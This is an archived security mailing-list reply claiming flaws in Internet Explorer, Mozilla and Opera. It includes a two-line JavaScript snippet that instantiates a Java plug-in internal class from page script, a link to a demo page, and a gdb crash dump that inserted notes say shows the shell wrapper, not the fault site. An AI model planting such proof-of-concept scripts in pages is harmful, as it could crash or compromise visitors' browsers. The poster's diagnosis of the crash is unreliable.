Message-ID: <33637.66.58.158.195.1063326818.squirrel@www.nothotmail.org>
From: meme-boi at nothotmail.org (meme-boi)
Subject: RE:Internet explorer 6 on windows XP allows exection of arbitrary code ( and opera and Mozilla too)

>WORKAROUND :

>Disable active scripting or do "the sensible thing" and pick another
>browser such as the excellent mozilla firebird.

Mozilla ...

<!-- NOTE(review): the script asks the browser's JavaScript-to-Java bridge (the Packages global) to construct sun.plugin.javascript.navig5.JSObject, which looks like a Java plug-in internal class, directly from page script. The message calls this an unfixed Mozilla issue but does not state the observed effect or the affected versions; confirm against the vendor's bug tracker. -->
<script language="Javascript">
t = new Packages.sun.plugin.javascript.navig5.JSObject(1,1);
</script>



hmmm

or

http://drorshalev.brinkster.net/dev/memeboi/werd.html

Both serious issues mozilla has yet to fix.


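Or we can look at Opera and conclude that no graphical browser is safe:

[Editor's note: in the gdb session below, frame #0 is waitpid() and eip sits immediately after the `int $0x80` that issues syscall 0x72, so the traced process is blocked waiting on a child. The frame names (reader_loop, execute_command, wait_for) look like those of the shell running the /usr/bin/opera wrapper script rather than the Opera binary that segfaulted, so the register dump and disassembly do not show the fault site.]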


/usr/bin/opera: line 138:  1289 Segmentation fault     
"${BINARYDIR}/opera" "${@}"
"${BINARYDIR}/opera" "${@}"
(gdb) /opt/opera/lib/opera/plugins/operamotifwrapper: error while loading
shared libraries: libXm.so.2: cannot open shared object file: No such file
or directory
(gdb) backtrace
#0  0x21ad4397 in waitpid () from /lib/libc.so.6
#1  0x080777f6 in kill_pid ()
#2  0x080767a3 in wait_for ()
#3  0x080687c6 in execute_command_internal ()
#4  0x0806c0a7 in execute_command ()
#5  0x0805d48c in reader_loop ()   <---murder loop
#6  0x0805b8a0 in main ()
#7  0x21a407a6 in __libc_start_main () from /lib/libc.so.6 <--redrum lib
(gdb) info reg
eax            0xfffffe00       -512
ecx            0x5da26398       1570923416
edx            0x0      0
ebx            0xffffffff       -1
esp            0x5da2635c       0x5da2635c
ebp            0x5da26378       0x5da26378
esi            0x0      0
edi            0xffffffff       -1
eip            0x21ad4397       0x21ad4397
eflags         0x246    582
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x0      0
ftag           0xffff   65535
fiseg          0x0      0
fioff          0x0      0
foseg          0x0      0
fooff          0x0      0
fop            0x0      0
mxcsr          0x0      0
orig_eax       0x72     114

(gdb) disass $eip-0x20 $eip+0x20
Dump of assembler code from 0x21ad4377 to 0x21ad43b7:
0x21ad4377 <waitpid+23>:        mov    $0x7,%dh
0x21ad4379 <waitpid+25>:        add    %cl,0x2b88b3(%ebx)
0x21ad437f <waitpid+31>:        add    %cl,0xf685087d(%ebx)
0x21ad4385 <waitpid+37>:        jne    0x21ad43be <waitpid+94>
0x21ad4387 <waitpid+39>:        mov    0xc(%ebp),%ecx
0x21ad438a <waitpid+42>:        mov    0x10(%ebp),%edx
0x21ad438d <waitpid+45>:        push   %ebx
0x21ad438e <waitpid+46>:        mov    %edi,%ebx
0x21ad4390 <waitpid+48>:        mov    $0x72,%eax
0x21ad4395 <waitpid+53>:        int    $0x80
0x21ad4397 <waitpid+55>:        pop    %ebx
0x21ad4398 <waitpid+56>:        cmp    $0xfffff000,%eax
0x21ad439d <waitpid+61>:        mov    %eax,%esi
0x21ad439f <waitpid+63>:        ja     0x21ad43ae <waitpid+78>
0x21ad43a1 <waitpid+65>:        mov    %esi,%eax
0x21ad43a3 <waitpid+67>:        mov    0xfffffff4(%ebp),%ebx
0x21ad43a6 <waitpid+70>:        mov    0xfffffff8(%ebp),%esi
0x21ad43a9 <waitpid+73>:        mov    0xfffffffc(%ebp),%edi
0x21ad43ac <waitpid+76>:        leave
0x21ad43ad <waitpid+77>:        ret
0x21ad43ae <waitpid+78>:        neg    %esi
0x21ad43b0 <waitpid+80>:        call   0x21a40980 <__errno_location>
0x21ad43b5 <waitpid+85>:        mov    %esi,(%eax)


Time to revert to command line !

I speak about this on the mighty bugtraq but noone listen. not even friend
9or.
Anyways. I have to go clean the floor at walmart.

ninjas are bad



